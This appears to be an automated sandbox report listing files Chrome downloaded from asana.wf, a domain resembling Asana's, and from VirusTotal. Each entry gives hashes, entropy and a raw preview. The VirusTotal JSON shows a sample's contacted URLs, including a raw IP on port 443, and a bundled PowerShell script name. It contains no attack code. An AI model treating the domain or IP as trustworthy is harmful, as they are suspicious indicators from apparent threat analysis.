                                                                                                                                                                                                                    SSDEEP:3072:f5bvHzQ7DolgjD7PAbi7hGzwFx9LzMCKis16wK4Th6ytoPReugyLWFM6EIojo9RL:yS0PdL6q41KNsrH
                                                                                                                                                                                                                    MD5:D4D8297C3557392AD12FDBC10BBD4D8B
                                                                                                                                                                                                                    SHA1:DC13F3C496621CA73C807D296C2BAC46245592B4
                                                                                                                                                                                                                    SHA-256:EACB487A3ED92B02EDA613FD56DDE267750F5C381F78E175FCA258AD2B1F52F8
                                                                                                                                                                                                                    SHA-512:203465230D4AF621BADDB4D503C1EEBC82F52686B9B82D35B4761E3EAD4CEF57B1BF33132C822CA959307A24426B34ECB34D20DB319A4573BD17E38BD2751792
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/
                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html lang="en">..<head>. <style id='hp_002_aa_style'>. .hp_002_aa_v {. display: none;. }. </style>. <style id='tem_003_icon_link_removal_style'>. .tem_003_icon_link_removal_v {. display: none;. }. </style>. <style id='sd_041_download_page_v3_style'>. .sd_041_download_page_v3_v {. display: none;. }. </style>. <style id='sd_045_prominent_product_engagement_style'>. .sd_045_prominent_product_engagement_v {. display: none;. }. </style>. <style id='sd_046_apps_search_style'>. .sd_046_apps_search_v {. display: none;. }. </style>. <style id='pnp_012_rearrange_plans_style'>. .pnp_012_rearrange_plans_v {. display: none;. }. </style>. <style id='pnp_013_pricing_card_expanded_style'>. .pnp_013_pricing_card_expanded_v {. display: none;. }. </style>. <style id='slg_014_video_background_style'>. .slg_014_video_background_v {. display: none;. }. </style>. <style id='fd_002_values_
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):26606
                                                                                                                                                                                                                    Entropy (8bit):7.976686332513471
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:fL4HJ3V3TR9xpjn6dJGoKCSEBNrTfTnsstWPR4WFbdRm1CcFlX4sJA86RywLZq/:TYb5pj6dkoKmLnsst/WFbdqfD4sJVWtQ
                                                                                                                                                                                                                    MD5:2D308B90075EACC8E1DAF15744DE3A1F
                                                                                                                                                                                                                    SHA1:3203418C8BFF4A36B07FDC2822CE1CF75AA09B13
                                                                                                                                                                                                                    SHA-256:D87EB6F6F79D00B44BF7F71FD41513A0877ECBA46D3D651FFC6C67C80ABE9891
                                                                                                                                                                                                                    SHA-512:A483CFBF8870F850CFF5E2810E7B49B1A89A1992D6D8FF609A65C71610F3D46D55327F41E60EB4C710FCCE152A88C01D442AB0F2765C4DD04B525BE812755F24
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/home24-marketing-team-en-ui.webp
                                                                                                                                                                                                                    Preview:RIFF.g..WEBPVP8X..............ALPH.......m.0..g;}....@....q6'p.IR$...0R..........8.+..#a$......0.......DD.aH.|..>z.x_...sk.....7}...I...,D..y..C...7.B..E\.{:Qcl...P..@...@cm.0....m......~....6_...?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?........r....F.m...r.m..........@.l.........E.W.Vq=....2..,w...*.Fci..\'.V...d......pN..S.CVP8 .d......*....>.H.L..&...(....in.*...B:.......g..U.;}z8.......O.....o7...C.....r.<{......._......{.............^...w....%..._.?.......?...?.}........._.............d...+.../..f...3./..?....G.W./.o._.?........
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 12133
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):4515
                                                                                                                                                                                                                    Entropy (8bit):7.95111405100596
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:vX7RB6XGGcAgOaKb/kroi8kqGZPKw5AGfm69C2+ib0bOMLk7XFvJERII:vrRA2CFaKENuGVxAGfZB+mqNaFvJERP
                                                                                                                                                                                                                    MD5:EC59295DC377438D43337E85A634D236
                                                                                                                                                                                                                    SHA1:80817B1F0C00C3126C339E44C4CC3670FDCC5145
                                                                                                                                                                                                                    SHA-256:1383B018A0815DC9678D2A4D3DA29FC139A083DBBC4D96702B9683507B71DF6D
                                                                                                                                                                                                                    SHA-512:C42CFB05EA90450641AC2A1F286363ADE8616594B686A726A2342725A73CF657B9B980787C1C5B4AD56753F60F43AD21D95369110E167F73595D7BD9C63E7747
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/82353.cb048b4e709c7dfeabf5.js
                                                                                                                                                                                                                    Preview:...........ZkO.......E%[.M..4U....^.e..@k.......k.,.....'2.v...gu..v4.......q".Y.ZT<...Y:........,.|..3..E<.?.{{..w.rVO.../.{.{...............y.8..-.8.Yxy-?.;....t..9H...h.;.S^..........$d..(b.`.\p.Y}.D..g..7..........<..#KB.z.f..E.....6..|..X...~5.7..X.a.Y....?...C.$...n../....s....-.!...*.i".. N.I8N>K.0......=.<..hg..s.(...t:Y.....,.5/....O.|..g...<>...6b\.0.........r..C..7...'V5G.<$..h...Y...k.`....G..y*X.8P.O.R=.jCz...l..Gl-1..jI.*..3V..%..9.x.H...e$..'..C|..jQd...G.4.?VGh{....O...F...O}/....Y.......K.{.>:3m....E...-...^.....<Ng.[...U.5... .6...q/.....^s.a..{.......{...~....1ua...m,....`..Rc.]x.....r...2.KM.+.../..3...Z!:avm.g#Fr>.E.\p.t.8`Hz.S$'PI....d.)|..,9\....vL..E<D...h&X.H..q$.T.x...f/......[..0$.....=..?r....w>........|q=....9:..9....{..{t.w..f..}.q..._...?.^E.G....7.....sFcwv.....?.......w.;.2o.zco.my..w.x....>..Y.....u#....g..D.(......).46......'......9..*Jx....+^..N.. ..c.r...~-Y1.....5.k}A...y..o.Zz.,E.2.ft.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):101879
                                                                                                                                                                                                                    Entropy (8bit):3.141611615508273
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:TbmCcKFTQFCUbmCcKFTQFCLPbqCGuFTQFCnbmCcuFTQFC7v:TbmC6CUbmC6CjbqCQCnbmCOC7v
                                                                                                                                                                                                                    MD5:10B41330648D830BCFB55DA4A77D680A
                                                                                                                                                                                                                    SHA1:D1905057F5EA41F4493187274EFC5074E79BCA75
                                                                                                                                                                                                                    SHA-256:B3FAE38C416E734FE15872535E41A0CC65BE41D48581FE3D742A03B05B6410CF
                                                                                                                                                                                                                    SHA-512:CE4805808C9846DD08ABD3D69F117DE7264EA78495773FA7622736C514522FA23E04DFAECBA895BEC7C1D020234AD75C7118EAF08C2BAEE332DB7E8F7274B515
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_urls
                                                                                                                                                                                                                    Preview:{. "data": [. {. "id": "08c8eee9a5498c2a204f017aec983751564b19bca83e4affd2b9164867f2ef20",. "type": "url",. "links": {. "self": "https://www.virustotal.com/ui/urls/08c8eee9a5498c2a204f017aec983751564b19bca83e4affd2b9164867f2ef20". },. "attributes": {. "times_submitted": 2,. "last_modification_date": 1714022333,. "last_final_url": "http://5.8.63.140:443/fakeurl.htm",. "first_submission_date": 1713200922,. "last_analysis_stats": {. "malicious": 0,. "suspicious": 1,. "undetected": 23,. "harmless": 68,. "timeout": 0. },. "title": "",. "last_analysis_date": 1714022320,. "total_votes": {. "harmless": 0,. "malicious": 0. },.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):12168
                                                                                                                                                                                                                    Entropy (8bit):7.973984646008146
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:deBgH7UvX1yotyPintNpaOzulD7Ps8Qj36NeB7KnPCBLGAkQPvLynKBU7/nkacEL:KgHwvX1BuQNpAHkZqeB7uKIQXLynKBUD
                                                                                                                                                                                                                    MD5:4A2B76058A3E9F0CC563D84B91B4E654
                                                                                                                                                                                                                    SHA1:E7572E7BC9D8D4099AF08944A27392D28C7D715A
                                                                                                                                                                                                                    SHA-256:B5505605161A0DD5ED97A4355F78250953B6E3ECA9ECB016D2A1696094959B17
                                                                                                                                                                                                                    SHA-512:EB9E334BEF8228D0C979D8213C53799004D8686956ABE9F4FDBCD5F7A7024994173EB1CDC41EFDAC4599C09B80A19696867847EB963A8E2D5B52BFA4DAA45805
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/home24-security.webp
                                                                                                                                                                                                                    Preview:RIFF./..WEBPVP8X...........c..ALPHk........F'.n....@Hb1..8H,#.........b....y>..."..F.Dc..[{...+.|.79...~....^..e.M.-c.....j.wu.!OzY..zk...D.....M.-%..Gy...W..k.y.(..4.e+?[...H.^N?96.w."Mz....&.vA.I/...j.F.&..f66.7..&..h...eo@...&....!Mz.2.m."Kz..9.4..T.v..._...=.v."Mz.5..E.......?............?............?............?............?............?............?............?............?............?............?............?..............."Mz...F.&..g..Q.I/.Io.(....-z...^|...O.eY..b6.m."Kz...V..G.(.^.....=.^^\...wP.EY...G.q....e....Y.....Me[...zy.4.>...r....bQ..</z........,Gz.7..U..ugQ..T........:Z.ue/.....~...m..X.%H/...u-..VP8 .,.......*..d.>.H.K..".......en.P.W......U....oe...7...o..*...........}._.w.`....?....G......W.....P...:.=..v=Z?.~.|<~....gj.....p?.zn..-3..[........G.........[.<....{....?....5......._.=Ezj..;.O.eL..1KK.P...r.,....*.y....m>LR.B...b....z...b....z....h..gd..)....T=.....*.y.......*.y...o*z}.*fvA...u...M.T....<...T..2.YS3.3R
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):41224
                                                                                                                                                                                                                    Entropy (8bit):7.993002139217561
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:768:cETUa4lPnbCNIBGbuuAqry87yUOKfivm0yBFtt7lCGG4SbFc9Zrqpwl58X/MMCQa:cETUlJLBGbjAqhOKfieBGGG4SyZOrvMB
                                                                                                                                                                                                                    MD5:1EEDA9AB347503FBAE60C78F5239D61B
                                                                                                                                                                                                                    SHA1:4B926835362AB22B87053331443DF53FAA3BEF18
                                                                                                                                                                                                                    SHA-256:3BBEF196F2519D64E73A38C4D3BD658858EE88F14E81C9CF96F6A8A585E90C77
                                                                                                                                                                                                                    SHA-512:67D162D010C57608252844CFD287EBE955A023D85F8D9A0C0F1F7013416E23FE5D54010125EC35220B3AFED76A79A1DDDAE7B0ECE34849652B873D6BEBCC3C08
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/home24-demo-thumbnail.webp
                                                                                                                                                                                                                    Preview:RIFF....WEBPVP8X......../../..ALPH......U..6..!\(B..A$.....,.2.....s..;_.cF...KO..1..q..[..t..q.^...8..+.c...h..2....F...yT.\..21z.k..r..iT."..b..F...C.X.b1.o..zT.>.e..........................................................................................................................................................................................................................................}/G..jq.Y-..X..Z...-b*.9E.^).........L...~*......B../]z}.s....6.....Y.2.).=..=.a.>?...VP8 ....p....*0.0.>.D.J%.).&.*.0..gnP.8......j.&.Y%8..b..;..|....y......qizk..../~......H..E.C.....G|.....P.T............./............on..v.L.+..=.5........w.}.{z}*~..?...+..g....J:h.H.6.M..*.(...S...8>h.(.Q.B...P.......G.;oO..I.w...J.TKl..V..o[.u.y..S#4.6<.}..Tf....zM.m.....K...m............m..q.e..vG.m....)]YR...]....e.."_..v.')...P.<..Bk.B.......MJod+#...r.@....0Y}.|c....1{..`.......wd.!....7..[.rPj.......t....dI&z...o..8..^G.9Q-?.n.6.5..u.J..4.m.Q.O.E....
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):228
                                                                                                                                                                                                                    Entropy (8bit):4.89026477967318
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:3RsJwouzsY6A++sdLA23MA7DQ6bIrSQnDIQCfym2V/mFVMGAn:K+F2AwrDDerSnQCuV/m7MGA
                                                                                                                                                                                                                    MD5:624C8F8C169D5FEA76484787FEA6D920
                                                                                                                                                                                                                    SHA1:84CEC29A5730641BA91939815022D8365B0C76C3
                                                                                                                                                                                                                    SHA-256:676B8E854A9534AD7200A2E85F48DD8015799D9FDC3687BB8168129D4205CE02
                                                                                                                                                                                                                    SHA-512:E11E43C9C60B0274E0C32BC278EBB8F14E61C7104B5ECDAFAE73C891FFA32CCB75323C07A020B240AEE8EF55CFCE3D75A5B0345DEA29457B60E759712FE8F1EC
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_parents
                                                                                                                                                                                                                    Preview:{. "data": [],. "meta": {. "count": 0. },. "links": {. "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_parents?limit=10". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):6081
                                                                                                                                                                                                                    Entropy (8bit):4.199726045993515
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:Vswt+VqAFyHa/POzYqjv05QyNXGMxH+00R9QaEe6KnVw4B:SwA4AFyHa/PWzs2yNXxH+00R3bVwK
                                                                                                                                                                                                                    MD5:58C023913A21D8D59A877A81B1B6957D
                                                                                                                                                                                                                    SHA1:97F8E07E9163161C0AB2836BDE5D11FCA80F5F6D
                                                                                                                                                                                                                    SHA-256:DC39E241F967FF3897379644C8FD335B3D52C18E31C6B4478D4F5FEBC74A533A
                                                                                                                                                                                                                    SHA-512:152F36D600012B561980CDD91ECC46BD1F65EAC42F8166A30CDF205FB8A4D9AFF9D0B95F444F0B8F942252857DB203A7703183E62D5D9C4DF6A30F80C30C5011
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://asana.wf/img/logo-ratio-40pxheight-Amazon.svg
                                                                                                                                                                                                                    Preview:<svg width="150" height="40" viewBox="0 0 150 40" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M88.344 32.4292C81.8485 37.2328 72.4336 39.7956 64.3276 39.7956C52.9617 39.7956 42.7294 35.5779 34.9883 28.5629C34.3801 28.0113 34.9251 27.2595 35.6549 27.6891C44.0091 32.5659 54.3386 35.4998 65.0088 35.4998C72.205 35.4998 80.1212 34.006 87.4001 30.9061C88.4997 30.4375 89.4193 31.6286 88.344 32.4292Z" fill="black"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M91.0443 29.3295C90.2172 28.2653 85.556 28.8267 83.4638 29.0757C82.8264 29.1538 82.7291 28.5973 83.3032 28.197C87.0157 25.5755 93.1073 26.3322 93.8177 27.2109C94.5281 28.0945 93.6328 34.221 90.1442 37.1451C89.609 37.5942 89.0981 37.355 89.3365 36.7594C90.1199 34.797 91.8763 30.3986 91.0443 29.3295Z" fill="black"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M83.6098 9.6906V7.14237C83.6098 6.75671 83.9017 6.49799 84.252 6.49799H95.6228C95.9877 6.49799 96.2797 6.7616 96.2797 7.1
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 14824, version 1.0
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):14824
                                                                                                                                                                                                                    Entropy (8bit):7.984080702126934
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:9FhwoaJnaNM4+g4PQPq2ORxaT108SURx1qA3VyI6UvrkBxLA0THRTe:ZKaNMQ4oPG4T1FLXzFyZU92Hs
                                                                                                                                                                                                                    MD5:48598BAD30F08E1C3EB3D0E69B420BD5
                                                                                                                                                                                                                    SHA1:28C2CF160273C2062F909A875C4B4C0541EE2F84
                                                                                                                                                                                                                    SHA-256:CA57B79A870BBF54700730858603A70D79743779C1B059922EC401BFDDC5ADC9
                                                                                                                                                                                                                    SHA-512:0033327198BD448927A53EADA9AED51ED4F8DA3C8619EDA3B10948F437213F20270C233F7FD403C8C192A05CAEED6905A02D8C62EC22B3885A6A7D6C018F737C
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/ee990a93df71bfdfb3b5.woff2
                                                                                                                                                                                                                    Preview:wOF2......9...........9..........................n..6....`..b...P.x..d..6.$..D. ..|..4.gv%.m....B....y......sB.<....t..:S...@..\..w..x...8AMW.S......Z?.$.......mut....X..@.._.._$..Af'g...'.d.x.q&..T1Q_....n..z.._}...#v"......s.s......PiVBEW.2R.....8g....i.*..J.+Z.&..6trL.15.L.cn.D..!~N..WZ.DcJBB....$.<..T...ue.}...+..j..;:U..S...}.6a.iS.i.LId....K..`u.%.$...H..8<B.......a.`c.11..m=.*.....l.B9;..?...w.Je^i.8p.5......#........v.Y:.b...,....L.....(........;_.IvQ.K.X"J...(.,...O....[D.\...\.........I.k.;+.....b........Z...)......P.u.(@P....pQ..]...e...6F..v.'.....;..hW.=.B,*W..G....d... @...........(..9....R..\T.W)tvSz.4NU..rQu...|....<B!....H.k.)..!.8..@...............qS...9.k.lE.....I..[.S.}...*.0...}?.U.......@....a$X......'N....!I. 5.e..(....V...].... ....AVUN..:.s.......5.W.H.I......>....d...b.G.h.##.......q.zu.f^...O..s.]H?....(`..O.,.N;oo...G.4.~.N...C.......'.T.,..0W....z+?w.../\..B{.ebz.....OI.."._...~.211S1...... ........s...N..pC.(.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):64905
                                                                                                                                                                                                                    Entropy (8bit):3.4143666034533133
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:+6U7wkNwxUk1cJJTJTr3e/S0Qm1XaKMwnWT7ILSMXvm67kZcVH1vYa2P/jAqEao2:+H76xWU4xTCtiMn65
                                                                                                                                                                                                                    MD5:39F263134BE63C3816F938A7979003C4
                                                                                                                                                                                                                    SHA1:B6FC213E4B48F1DF9B5A8153F8E7EF42DDF71F7E
                                                                                                                                                                                                                    SHA-256:5F93336D05A8B95F89B589ACF03D3B5C09A71B288A29E734AE502B53235C1FD7
                                                                                                                                                                                                                    SHA-512:83AABDE570CEA3B3D14AD8814BAF39D26F4454612D9A3CB09462100BAF9798BD400D36F67F48B9B2E2670D46D4A530B768C05FAA50FBFBA296C22055451BE6CF
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/bundled_files?limit=10&cursor=MTB8fHYzfHwxNzE0MDc0OTU4fHw5NDU0YmQ1YzIwNWM4NTFhYWE4MDI1ZTc4NjY4YzBjYWZjZjNhZmY3N2QzYjY5ZGJiZjU0YWYyZmI5OWIzNWI5
                                                                                                                                                                                                                    Preview:{. "data": [. {. "id": "7778c658411a2f1649ced14cdfe8a92145c1c7fa53b1ce5b14920000fe99bd98",. "type": "file",. "links": {. "self": "https://www.virustotal.com/ui/files/7778c658411a2f1649ced14cdfe8a92145c1c7fa53b1ce5b14920000fe99bd98". },. "attributes": {. "total_votes": {. "harmless": 0,. "malicious": 0. },. "type_description": "Text",. "sha1": "15ba3dc3bbcb16a26839862d79b3519e74a5e03a",. "ssdeep": "384:wrBzBV4OHcvFcYlu2V8uMcg5apqpBw2qFA5WFQExxR/c/mZ1:KBr4DSYlu2VzMcgwgBLqJQO/ceD",. "first_submission_date": 1701113263,. "meaningful_name": "StartingScriptWrapper.ps1",. "times_submitted": 7,. "last_analysis_stats": {. "malicious": 0,. "suspicious": 0,. "undetected": 61,.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):245
                                                                                                                                                                                                                    Entropy (8bit):4.955781993677545
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:6:3RsJwouzsY6A++sdLA23MA7DQ6bIrSQnDIQCfym2KvLMfEOAAn:K+F2AwrDDerSnQCuKvLMfEhA
                                                                                                                                                                                                                    MD5:F8C3A4A1FCB8B7FF55E8647D84EB17EE
                                                                                                                                                                                                                    SHA1:3D9D925816F2334195EC58B0129F12AD3C086DFC
                                                                                                                                                                                                                    SHA-256:17C1C8E64DF80C79C9D2D4B50CE02136C0671566FC29EACEBBD963FFA529D8CC
                                                                                                                                                                                                                    SHA-512:A244326F51C84D5716F7B996D347F94A1DEE136071343E005BB49EC6EC0428E9CF83E77B7261080D755391C90558B9912FE051B08CDD27383A50DB8A64B7E018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/comments?relationships=item%2Cauthor
                                                                                                                                                                                                                    Preview:{. "data": [],. "meta": {. "count": 0. },. "links": {. "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/comments?limit=10&relationships=item%2Cauthor". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):45
                                                                                                                                                                                                                    Entropy (8bit):3.184885595704673
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:SERQwFkNjDKhn:3RT+NjDwn
                                                                                                                                                                                                                    MD5:3F5BF8AE841B11F22E0CE3ACB4CA7204
                                                                                                                                                                                                                    SHA1:DDBE96AAD6185EFBE77F5DEA6DFEFA10FC3EEE6B
                                                                                                                                                                                                                    SHA-256:67DEA4D2E0E48D070D599FC6E4B65D78A0D49A868441D1C22FB84BFFD1403F4A
                                                                                                                                                                                                                    SHA-512:D9525A031A95E1919E242AEBB459B96B02F3B7691166F05BD88A22CC06A4D35913A5D50031CCAB45F14633BF4A8635E9C966ACDF57536974EBC46F8506AFD403
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/cookie_disclaimer
                                                                                                                                                                                                                    Preview:{. "data": {. "show": false. }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 33369
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):10314
                                                                                                                                                                                                                    Entropy (8bit):7.980166288614498
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:he3u5X5Ezx0eF4FaxTmoZuzoClXPUPb3TpyCOwMz7TfuWYUcqg4:7pE5F4wxtsRXckX27xk
                                                                                                                                                                                                                    MD5:20B00D50BB9B6F42FAA9124F2719C37A
                                                                                                                                                                                                                    SHA1:3655237DA8E5C62773F4E6869E639C6F63D260F2
                                                                                                                                                                                                                    SHA-256:0CF0093B6D5DEA73F255A1071F4AD46E96AA7F589DD8FA6A665E83DCCB7CBDF4
                                                                                                                                                                                                                    SHA-512:499A23BC30D75EF5796BAA624194382398492EBF38A44B085FD77D8CF6FDD2B87C60229B8F0F9731F8AB7455591ED7E55643CA8C5E542E865F489064A560E1CB
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/63334.fa0abcaaac3e415ca2c7.js
                                                                                                                                                                                                                    Preview:...........}{w.F....)`.......4.h.g........E+.D..E.\..c(~....n..J.go...f,..Q]]]]....L9Y.F...ofj6.o.p...N....:.\F.. .._.?.p..2.6......w..........i{..N...uwv.......ou.A....r/u.G.. u.A.....^.O..............e......w....n....L....y.@..T.....e<.$......b@...r..<.g*..S@.^n..{.r6....d.~.Y.r....7.4Y.4..Ye.4Z.I.$.{I?.7...m....B%c.........F...Q...r...^4......3.d..`.4..N?8...A..6.:..../..I........p....p.....*_...../../.*C5.beV...5.v1h...Y.e...U.fN.FI..Y....*[.@M....^>.2.&....A.....&..-....."....YG....g..[..4..[. V.Tz&..Z..b.......L..*....{c75.....A...h*.V.V~.lT.f.8...j.....).D...1*.2.).3..$..8S .m...<f.@Y3.Pz.y..u..N......s.y...g\..6..\[.m.D8..Y.....g.d...]W3S.....I.y.........on...DG.\o..F......D..._.\/}.. .......Fk.,x..K.nA.A..Z...b^.sE2.....|.. .Iy3.4....`?.;..-..}...5.k7.f.5..O..4.......9.........e...W.u..\._G....H..t>h...N.`94.m`..DqB.`.A...E....$.+...t..n...i.9..f.5.ZQ<N.~.....|.tu...8.U.I.B.......ok..[X...*$.H.....^$.Z.U.t.ko..x.b..,....S....u.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 23892
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):7999
                                                                                                                                                                                                                    Entropy (8bit):7.975358073608855
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:NGLXJAxXqRrwTLM/rxof1cUM9Ce73cF00VPxlPmTI5/3eVUOKUNm3LanKUj594AQ:sbJWbM/rASU44O0VaTIJU1m3Jc5Hc4u
                                                                                                                                                                                                                    MD5:C69A452E674DC764C3612192319879FC
                                                                                                                                                                                                                    SHA1:F036092FB6EEABB734F51DF44E333013983AC850
                                                                                                                                                                                                                    SHA-256:43192857BE282B934AE71A5963EDA660D68DF501F522E7FD63AE19AED2D7DEA5
                                                                                                                                                                                                                    SHA-512:FB5C8687BD280E1B8B359084BB29944643ECDFFF0755463DBE629BD93B1C18DDBC866F02C70E773E74C32D672B6A5263DB6ABE1DFC54ADACEA4BBBC4D0C10514
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/13870.5eac014aaa55fec657a1.js
